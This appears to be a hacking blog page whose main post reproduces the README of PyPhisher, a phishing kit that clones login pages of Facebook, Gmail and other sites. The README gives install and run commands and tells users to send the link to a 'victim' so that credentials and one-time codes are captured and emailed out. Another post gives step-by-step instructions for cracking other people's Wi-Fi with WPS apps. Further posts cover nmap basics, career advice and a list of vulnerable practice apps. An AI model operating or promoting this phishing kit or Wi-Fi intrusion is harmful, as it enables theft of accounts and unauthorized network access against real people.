PyPhisher - Ultimate Hacking tool

Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.

[*]Announcent

This project is now a part of MaxPhisher. Further bug fixes and feature addition will be available in that

[+] Installation

Install dependencies (git, python, php ssh)

• For Debian (Ubuntu, Kali-Linux, Parrot)
  • sudo apt install git python3 php openssh-client -y
• For Arch (Manjaro)
  • sudo pacman -S git python3 php openssh --noconfirm
• For Redhat(Fedora)
  • sudo dnf install git python3 php openssh -y
• For Termux
  • pkg install git python3 php openssh -y

Clone this repository

• git clone https://github.com/KasRoudra/PyPhisher

Enter the directory

• cd PyPhisher

Install all modules

• pip3 install -r files/requirements.txt

Run the tool

• python3 pyphisher.py

Or, directly run

wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py

Pip

• pip3 install pyphisher [For Termux]
• sudo pip3 install pyphisher [For Linux]
• pyphisher

Docker

• sudo docker pull kasroudra/pyphisher
• sudo docker run --rm -it kasroudra/pyphisher

Support

OS	Support Level
Linux	Excellent
Android	Excellent
iPhone	Alpha (Recommended docker)
MacOS	Alpha (Recommended docker)
Windows	Unsupported (Use docker/virtual-box/vmware)
BSD	Never tested

Options

usage: pyphisher.py [-h] [-p PORT] [-o OPTION] [-t TUNNELER]
                    [-r REGION] [-s SUBDOMAIN] [-u URL] [-m MODE]
                    [-e TROUBLESHOOT] [--nokey] [--noupdate]

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  PyPhisher's server port [Default : 8080]
  -o OPTION, --option OPTION
                        PyPhisher's template index [Default : null]
  -t TUNNELER, --tunneler TUNNELER
                        Tunneler to be chosen while url shortening
                        [Default : Cloudflared]
  -r REGION, --region REGION
                        Region for ngrok and loclx [Default: auto]
  -s SUBDOMAIN, --subdomain SUBDOMAIN
                        Subdomain for ngrok and loclx [Pro Account]
                        (Default: null)
  -u URL, --url URL     Redirection url after data capture [Default :
                        null]
  -m MODE, --mode MODE  Mode of PyPhisher [Default: normal]
  -e TROUBLESHOOT, --troubleshoot TROUBLESHOOT
                        Troubleshoot a tunneler [Default: null]
  --nokey               Use localtunnel without ssh key [Default:
                        False]
  --noupdate            Skip update checking [Default : False]

Features:

• Multi platform (Supports most linux)
• Easy to use
• Possible error diagnoser
• 77 Website templates
• Concurrent 4 tunneling (Ngrok, Cloudflared, Loclx and LocalHostRun)
• Upto 8 links for phishing
• OTP Support
• Argument support
• Credentials mailing
• Built-in masking of URL
• Custom masking of URL
• URL Shadowing
• Redirection URL settings
• Portable file (Can be run from any directory)
• Get IP Address and many other details along with login credentials

Relevant Tools by Me

• CamHacker for image phishing
• VidPhisher for video phishing

Requirements

• Python(3)
  • requests
  • bs4
  • rich
• PHP
• SSH
• 900MB storage

If not found, php and python modoules will be installed on first run

Tested on

• Termux
• Ubuntu
• Kali-Linux
• Arch
• Fedora
• Manjaro

Usage

1. Run the script
2. Choose a Website
3. Wait sometimes for setting up all
4. Send the generated link to victim
5. Wait for victim login. As soon as he/she logs in, credentials will be captured

Example

Video Tutorial

PyPhisher in Termux 
PyPhisher in Kali Linux by InfoSecPat 
PyPhisher in Kali Linux by Sathvik

Whats new in 1.8?

• Mailing
  • Now you can send credentials to any email. You just need a gmail and app password to use this feature. Edit the data in files/email.json
• Custom Preview
  • Now you can set a custom social media preview of your link. Enter a website url when asked in shadow url. Your link will have same appearence as that website in whatsapp/messenger/telegram etc. Note this only works with Cloudflared urls
• OTP Support
  • 20 templates will show an option to enable otp pages
• Saved
  • An option to view all saved credentials just from PyPhisher. This credentials won't get deleted in PyPhisher update

Whats new in 1.9?

• Loclx
  • Introducing a new port forwarding/tunneling service named localxpose or loclx. It is quite slower but still usable
• Docker image
  • A docker image is published which can be pulled and run
• PIP
  • This project is now also available in PIP

Whats new in 2.0?

• LocalHostRun
  • Introducing a new port forwarding/tunneling service named localhost.run. It works over ssh without binaries
• Redirection url
  • Users can decide where the victim will be redirected after data is captured

Solution of common issues

• Some secured browsers like Firefox can warn for '@' prefixed links. You should use pure links or custom link to avoid it.
• VPN or proxy prevents tunneling and even proper internet access. Turn them off you have issues.
• Some android requires hotspot to start Ngrok or Cloudflared. If you face 'tunneling failed' in android, most probably your hotspot is turned off. Turn it on and keep it on untill you close PyPhisher.
• If you want mailing credentials then you need to use app password. Visit here and generate an app password, put that in files/email.json. You may need to enable 2FA before it.

[!] Disclaimer

This tool is developed for educational purposes. Here it demonstrates how phishing works. If anybody wants to gain unauthorized access to someones social media, he/she may try out this at his/her own risk. You have your own responsibilities and you are liable to any damage or violation of laws by this tool. The author is not responsible for any misuse of PyPhisher!

This repository is open source to help others. So if you wish to copy, consider giving credit!

Credits:

Some base codes and templates are from htr-tech, otp templates are from ignitech and url masking is inspired from jaykali

Want to show support? Just spread the word and smash the star button

 

Read More

Nmap :- The Network Investigator

Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators.

When it comes to hacking, knowledge is power. The more knowledge you have about a target system or network, the more options you have available. This makes it imperative that proper enumeration is carried out before any exploitation attempts are made.

Say we have been given an IP (or multiple IP addresses) to perform a security audit on. Before we do anything else, we need to get an idea of the “landscape” we are attacking. What this means is that we need to establish which services are running on the targets. For example, perhaps one of them is running a webserver, and another is acting as a Windows Active Directory Domain Controller. The first stage in establishing this “map” of the landscape is something called port scanning. When a computer runs a network service, it opens a networking construct called a “port” to receive the connection.  Ports are necessary for making multiple network requests or having multiple services available. For example, when you load several webpages at once in a web browser, the program must have some way of determining which tab is loading which web page. This is done by establishing connections to the remote webservers using different ports on your local machine. Equally, if you want a server to be able to run more than one service (for example, perhaps you want your webserver to run both HTTP and HTTPS versions of the site), then you need some way to direct the traffic to the appropriate service. Once again, ports are the solution to this. Network connections are made between two ports – an open port listening on the server and a randomly selected port on your own computer. For example, when you connect to a web page, your computer may open port 49534 to connect to the server’s port 443.

As in the previous example, the diagram shows what happens when you connect to numerous websites at the same time. Your computer opens up a different, high-numbered port (at random), which it uses for all its communications with the remote server.

Every computer has a total of 65535 available ports; however, many of these are registered as standard ports. For example, a HTTP Webservice can nearly always be found on port 80 of the server. A HTTPS Webservice can be found on port 443. Windows NETBIOS can be found on port 139 and SMB can be found on port 445. It is important to note; however, that especially in a CTF setting, it is not unheard of for even these standard ports to be altered, making it even more imperative that we perform appropriate enumeration on the target.

If we do not know which of these ports a server has open, then we do not have a hope of successfully attacking the target; thus, it is crucial that we begin any attack with a port scan. This can be accomplished in a variety of ways – usually using a tool called nmap, which is the focus of this room. Nmap can be used to perform many different kinds of port scan – the most common of these will be introduced in upcoming tasks; however, the basic theory is this: nmap will connect to each port of the target in turn. Depending on how the port responds, it can be determined as being open, closed, or filtered (usually by a firewall). Once we know which ports are open, we can then look at enumerating which services are running on each port – either manually, or more commonly using nmap.

So, why nmap? The short answer is that it's currently the industry standard for a reason: no other port scanning tool comes close to matching its functionality (although some newcomers are now matching it for speed). It is an extremely powerful tool – made even more powerful by its scripting engine which can be used to scan for vulnerabilities, and in some cases even perform the exploit directly! 

    For Download Nmap Click Hear 🤏

When port scanning with Nmap, there are three basic scan types. These are:

• TCP Connect Scans (-sT)
• SYN "Half-open" Scans (-sS)
• UDP Scans (-sU)

Additionally there are several less common port scan types, some of which we will also cover (albeit in less detail). These are:

• TCP Null Scans (-sN)
• TCP FIN Scans (-sF)
• TCP Xmas Scans (-sX)

Most of these (with the exception of UDP scans) are used for very similar purposes, however, the way that they work differs between each scan. This means that, whilst one of the first three scans are likely to be your go-to in most situations, it's worth bearing in mind that other scan types exist.

In terms of network scanning, we will also look briefly at ICMP (or "ping") scanning.

Read More

Cyber Security career

 

How To Succeed In  Cyber Security career ?

Many IT professionals hesitate to venture into the arena of cybersecurity. Maybe, they feel that mastering the techniques is difficult. Maybe, they have not been able to master the requisite soft skills. Whatever the reason, the supply is not in alignment with the demand! True, this is quite a challenging field. However, if you make it your passion, it could fetch wonderfully lucrative returns!

Let us take a look at all the skills that will work for You.

Technical Skills:

Now, you do not really have to learn every single technical skill on earth! Just the basics will do for a newcomer like you. To illustrate, you may add some programming languages to your portfolio. They include assembly language, Java, scripting languages (Shell, PHP, Perl or Python), disassemblers and C/C+.

There are diverse operating systems on display. Do you comprehend their architecture and administration? Will you be able to manage them efficiently? Then again, you should be proficient in networking. As an IT professional, you cannot afford to remain ignorant of concepts related to the development of software. You must be acquainted with programming, as well as analytics, too.

It could be that you are already working in an establishment. You are gaining experience in the above-mentioned fields. Regardless, no one will hire you to manage cybersecurity unless you have a valid certificate to exhibit. They include certification in an ethical hacking course (CEH), Certified Information Systems Security Professional (CISSP), and Certified Information Security Advisor (CISA), etc. You will need to display a few years of work experience before any certification course agrees to grant you admission. Then again, you should obtain your certificates from reputed organizations.

Management Skills:

The certifications and practical experiences will turn you into senior cybersecurity professional. Therefore, you should be able to manage all manner of assessments. They relate to web applications, network vulnerability, physical security, social engineering, wireless security, penetration testing, etc. All of them come under one umbrella, which is, technical vulnerability. Your expertise in identifying and preventing breaches of security will make any organization happy!

Soft Skills:

This must surprise you! Why would someone employed as a cybersecurity professional require soft skills? You need them for a simple task â€Â" communication. Not everyone in your establishment is acquainted with IT terminology. Remember that you are not working alone. You are part of a team. Therefore, you will have to convey the most complicated of topics in the simplest of words.

They are not the only ones who will benefit. Your career will benefit too, via promotions! the management understands your splendid presentation, it will feel in command of the situation. Similarly, customers will appreciate your kindness in explaining everything in plain language. It shows that you possess both, verbal and written skills. At the same time, you are not someone who is in love with his/her own voice. You prefer to exhibit yourself as a patient listener. Therefore, customers will love to converse with you about problems in the virtual world!

Your greatest challenge will come from the arena of social engineering. Hackers use clever and convincing tricks to lure people into parting with their credentials, passwords, etc. You may put every kind of security measure in place. Yet, somebody always finds a way to destroy it. Therefore, you will have to be on your toes all the time. Your soft skills will permit you to identify and explain your concerns to non-technical individuals, wonderfully well.

Implementation Skills:

How to Succeed in Cybersecurity Career | Insecure Lab

You have managed the theoretical aspects of cybersecurity magnificently. Now you must learn to put your knowledge to work too. Towards this end, observe the architecture of networks and systems keenly. It will help you to identify, as well as comprehend the usage of the existing security controls. At the same time, you will be able to recognize the weaknesses, if any, present in the deployment of applications, as well as in databases. Do bring your knowledge of coding and pre-built tools into play, if needed.

The above-mentioned are part of the professional side of cybersecurity. There is a personal side too, which only you can put into practice. One of them is developing good habits at work. To illustrate, you must learn to take note of every detail, whether it is significant or insignificant. Similarly, you must be methodical in whatever you do. This is evident when you go into in-depth explorations of technical issues with eagerness and enthusiasm. You are ready to adapt to any kind of situation. You display fantastic diagnostic and analytical skills, suggesting that you have up-to-date information about current web vulnerabilities. You have excellent knowledge of regulations relating to security and privacy too. In short, you are a walking encyclopedia!

No matter how much you study and practice, it may not prove enough in the 21st century. Hackers are always experimenting with novel ways to trouble business establishments. Therefore, it might help to set up a laboratory at home. You could use your own computer to set up multiple operating systems. Alternatively, you could use cloud technology to create an online lab. Do not worry about guidance. There are all manners of teachers available over the Net! Once you have set up the laboratory to satisfaction, use it to identify vulnerabilities. You can work out feasible resolutions too. The lab will help you to increase your practical abilities. In turn, you will be able to tackle virtual-life situations coolly and calmly.

Finally, never think that you know everything about cybersecurity. It is good to be confident, but not overconfident! Therefore, whenever there is a conference in your city, focusing on cybersecurity, attend it. Sometimes, a series of conferences are on the way. You can gain more via face-to-face meetings than you can from online conversations. Regardless, link up with professional communities online. Every individual has something of value to contribute. The more you learn, the better you will be in your job. Even social networking sites prove useful.

Read More

Web Application Hacking - List of vulnerable web applications

Web Hacking Practice Applications

• List of vulnerable web applications and Mobile Applications (please scroll to bottom of page) to pwn and learn.
• This will be updated on periodic basis.
• Vulnerable Web Applications

Damn Vulnerable Node Application (DVNA) -https://github.com/quantumfoam/DVNA/

Damn Vulnerable Web App (DVWA) - http://www.dvwa.co.uk/

Damn Vulnerable Web Services (DVWS) - http://dvws.professionallyevil.com/

Drunk Admin Web Hacking Challenge - https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/

Exploit KB Vulnerable Web App - http://exploit.co.il/projects/vuln-web-app/

Foundstone Hackme Bank - http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx

Foundstone Hackme Books - http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx

Foundstone Hackme Casino -http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx

Foundstone Hackme Shipping- http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx

Foundstone Hackme Travel - http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx

GameOver - http://sourceforge.net/projects/null-gameover/

hackxor - http://hackxor.sourceforge.net/cgi-bin/index.pl

OWASP Security Shepherd - https://www.owasp.org/index.php/OWASP_Security_Shepherd

PentesterLab - https://pentesterlab.com/

PHDays iBank CTF - http://blog.phdays.com/2012/05/once-again-about-remote-banking.html

SecuriBench - http://suif.stanford.edu/~livshits/securibench/

SentinelTestbed - https://github.com/dobin/SentinelTestbed

SocketToMe - http://digi.ninja/projects/sockettome.php

sqli-labs - https://github.com/Audi-1/sqli-labs

MCIR (Magical Code Injection Rainbow)-https://github.com/SpiderLabs/MCIR

sqlilabs - https://github.com/himadriganguly/sqlilabs

Hackazon - https://github.com/rapid7/hackazon

LAMPSecurity - http://sourceforge.net/projects/lampsecurity/

Moth - http://www.bonsai-sec.com/en/research/moth.php

NOWASP / Mutillidae 2 - http://sourceforge.net/projects/mutillidae/

OWASP BWA - http://code.google.com/p/owaspbwa/

OWASP Hackademic - http://hackademic1.teilar.gr/

OWASP SiteGenerator - https://www.owasp.org/index.php/Owasp_SiteGenerator

OWASP Bricks - http://sourceforge.net/projects/owaspbricks/

VulnApp - http://www.nth-dimension.org.uk/blog.php?id=88

PuzzleMall - http://code.google.com/p/puzzlemall/

WackoPicko - https://github.com/adamdoupe/WackoPicko

WAED - http://www.waed.info

WebGoat.NET - https://github.com/jerryhoff/WebGoat.NET/

WebSecurity Dojo - http://www.mavensecurity.com/web_security_dojo/

XVWA - https://github.com/s4n7h0/xvwa

Zap WAVE - http://code.google.com/p/zaproxy/downloads/detail?name=zap-wave-0.1.zip

BadStore - http://www.badstore.net/

BodgeIt Store - http://code.google.com/p/bodgeit/

Butterfly Security Project - http://thebutterflytmp.sourceforge.net/

bWAPP

http://www.mmeit.be/bwapp/

http://sourceforge.net/projects/bwapp/files/bee-box/

Commix - https://github.com/stasinopoulos/commix-testbed

CryptOMG - https://github.com/SpiderLabs/CryptOMG

Vulnerable Mobile Applications

ExploitMe Mobile iPhone Labs - http://securitycompass.github.io/iPhoneLabs/

Damn Vulnerable FirefoxOS Application (DVFA) - https://github.com/pwnetrationguru/dvfa/

Damn Vulnerable iOS App (DVIA) - http://damnvulnerableiosapp.com/

InsecureBank - http://www.paladion.net/downloadapp.html

NcN Wargame - http://noconname.org/evento/wargame/

Damn Vulnerable Android App (DVAA) - https://code.google.com/p/dvaa/

Hacme Bank Android - http://www.mcafee.com/us/downloads/free-tools/hacme-bank-android.aspx

OWASP iGoat - http://code.google.com/p/owasp-igoat/

OWASP Goatdroid - https://github.com/jackMannino/OWASP-GoatDroid-Project

ExploitMe Mobile Android Labs - http://securitycompass.github.io/AndroidLabs/

Read More

How to Hack Wi-Fi password

 How to Hack Wi-Fi password in Android :-

If you want to enhance your knowledge and want to know the tricks and ways to hack the Wi-Fi password using Android device, then this article will help you. Lots of people are asking about how to hack Wi-Fi passwords using Android and whether it is possible or not. The straightforward answer is "yes" you can hack Wi-Fi passwords in Android devices using some tricks and tools (apps).

Before diving into our main topic about how to hack Wi-Fi passwords in Android phones, we first discuss some of the basic information about the type of Wi-Fi password security.

Types of Wi-Fi Password Security:-

There are primarily three different types of Wi-Fi password securities. These Wi-Fi securities are as follows:

1. Wired Equivalent Privacy (WEP).
2. Wi-Fi Protected Access (WPA).
3. Wi-Fi Protected Setup (WPS).

Disclaimer Note: We doesn't support and encourage anyone to hack Wi-Fi password. Hacking is an illegal activity, and we won't be responsible for these tricks are used for hacking Wi-Fi. This article is only for knowledge's sake and educational purpose.

Method 1:Hacking Wi-Fi Password in Android using WIFI WPS WPA TESTER (without Rooting)

Wi-Fi WPS WPA TESTER is a popular Android app which is widely used for hacking Wi-Fi passwords. Wi-Fi WPS TESTER app hacks only those routers that connect with WPS router with limited features. Hacking Wi-Fi using this app is so easy and only requires follows few steps. The best part of this application is that you can use it without rooting your Android phone. You can also use this app on a rooted Android phone with some extra features.

Using this Android app, you can easily check the wireless security and strength of your router. If the router is not secure, then the WIFI WPS WPA TESTER app easily bypasses Wi-Fi password on your Android phone. After skipping the password, it connects the Android phone with the router without providing a password.

The Wi-Fi WPS WPA TESTER hacking apps work on both rooted and non rooted Android phones. Below are the steps to hack Wi-Fi password on Android without rooting.

1. Download and install the WIFI WPS WPA TESTER app from Play Store.
2. Enable the Wi-Fi settings on your Android phone.
3. Launch the app and search for the Wi-Fi networks nearby you.
4. Select one of the networks from the result and start hacking by tap.
5. You can input its key manually.
6. The app checks the Wi-Fi security, and it tries different combinations of words and numbers to crack the Wi-Fi password. The app finds the network code in a short time and connects your phone automatically.

Method 2:Hacking Wi-Fi password in Android using WPSAPP

WPSAPP is an all-in-one app that allows you to connect nearby Wi-Fi networks using an 8-digit PIN. The WPSAPP app makes easier and convenient to hack Wi-Fi password in both rooted and non-rooted Android phones. It applies several algorithms for generating random pins as well as some default pins. Using this app, you can hack any WEP Wi-Fi network without any difficulties.

When you scan for the networks, they appear with the red cross, question marks, and green tick marks. The red cross networks are secure, and their password is unknown. The networks showing with question marks have WPS protocol enabled, their pin is unknown, and the app allows testing them with a most common pin. Finally, the green ticks networks are WPS protocol enabled and their password known, and they can be connected.

Below we have mentioned the steps to hack Wi-Fi passwords on Android using this app.

1. Download and install the WPSAPP app on your Android phone.
2. Now, open the app and search for the nearby Wi-Fi networks for you.
3. Click on the enabled WEP network you want to connect.
4. Click on the "CONNECT WITH PIN" button, and after few seconds, the app displays your network password.

Alert: This article is only for educational and knowledge purposes; it is illegal to misuse this information (don't misuse this information).

Disclaimer Note: We doesn't support and encourage anyone to hack Wi-Fi password. Hacking is an illegal activity, and we won't be responsible for these tricks are used for hacking Wi-Fi. This article is only for knowledge's sake and educational purpose.

Read More

Hello World I am Certified Ethical Hacker !

 

This Is My Portfolio WebSite :

Click Hear

Read More